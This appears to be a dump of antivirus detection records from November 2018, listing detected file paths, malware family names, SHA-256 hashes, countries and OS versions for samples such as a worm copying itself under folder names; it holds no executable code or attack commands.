  Row(detection=Row(filename='store - na.scr', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Craft Store - NA\\Store - NA.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134156-80419a3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134156-80419A3C', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='restaurant - la.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Restaurant - LA\\Restaurant - LA.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='corel.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Corel.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tempsbe.bat', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempSBE\\TempSBE.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patterns.pif', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Bitmap Patterns\\Patterns.pif', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='content x6.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Content X6.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lists.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Image Lists\\Lists.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='templates.bat', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Templates.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134406-955a7738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134406-955A7738', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134408-95b7feda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134408-95B7FEDA', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134243-87d7197b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134243-87D7197B', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134245-883103d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134245-883103D8', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134247-888a5906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134247-888A5906', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134258-8a4ec891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134258-8A4EC891', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134249-88dbfdee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134249-88DBFDEE', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134240-874e38e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134240-874E38E6', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134251-89383726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134251-89383726', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134254-89a61ca1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134254-89A61CA1', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134256-89f9063c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134256-89F9063C', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134300-8a9ff1af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134300-8A9FF1AF', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134302-8af7b666', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134302-8AF7B666', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134410-960a3f59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134410-960A3F59', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0d384ced57efb106befa0630b8f8b8e71496b95d2d4933f92d554945c1976081', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T16:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-02T20:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161657-4f2ca997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6645ee91\\AVSCAN-20181102-161516-453FC779\\AVSCAN-20181102-161657-4F2CA997', filesize=128000, name='Adware/Elex.0dd3a5.#M1.#R1'), hash='0dd3a5f51f3139edc29338bf545981c0d56a9ff2fbc0c4b65a7d5607b89804b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goopdate.dll', filepath='C:\\Program Files (x86)\\Ckikachcoihusy\\goopdate.dll', filesize=128000, name='HEUR/AGEN.1014186.#M1.#R1'), hash='0dd3a5f51f3139edc29338bf545981c0d56a9ff2fbc0c4b65a7d5607b89804b3', metadata=Row(cmdline='76401b8b-aa12-4d8e-b10f-eadc43fc6401', country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Ckikachcoihusy\\vihght.exe', parentsize=685064, timestamp='2018-11-02T15:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170224-64887325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e17072eb\\AVSCAN-20181102-164500-D1947A3A\\AVSCAN-20181102-170224-64887325', filesize=128000, name='Adware/Elex.0dd3a5.#M1.#R1'), hash='0dd3a5f51f3139edc29338bf545981c0d56a9ff2fbc0c4b65a7d5607b89804b3', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DE5FBAC9FDA9A5CB9195EBC9162F8101DA8C96FC2CF5FB669A905636D5A804B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DE5FBAC9FDA9A5CB9195EBC9162F8101DA8C96FC2CF5FB669A905636D5A804B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:29:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DE5FBAC9FDA9A5CB9195EBC9162F8101DA8C96FC2CF5FB669A905636D5A804B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:53:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151417-a1f9b9f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8046b55c\\AVSCAN-20181102-151347-9D254F21\\AVSCAN-20181102-151417-A1F9B9F1', filesize=232000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='0deefadd6ab11ecf8248acb182649d5eb80e9f54e1df1795ca70fa53b184397f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='firefox8_integration[1].html', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\E4BPMV74\\firefox8_integration[1].html', filesize=232000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='0deefadd6ab11ecf8248acb182649d5eb80e9f54e1df1795ca70fa53b184397f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T07:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='video.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\savedgames\\VIDEO\\VIDEO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='0e501d89fea3ac71248a3c85031911d5e6978a8377684cbeae3f3fecf33f52f6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:35:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='savedgames.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\savedgames\\savedgames.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='0e501d89fea3ac71248a3c85031911d5e6978a8377684cbeae3f3fecf33f52f6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0EAC87397CCF95D2F010A776B7DFDB718FE46B49511251AE348E303310F8915E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0EAC87397CCF95D2F010A776B7DFDB718FE46B49511251AE348E303310F8915E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:54:20Z'), dt=datetime.date(2018, 11, 2)),
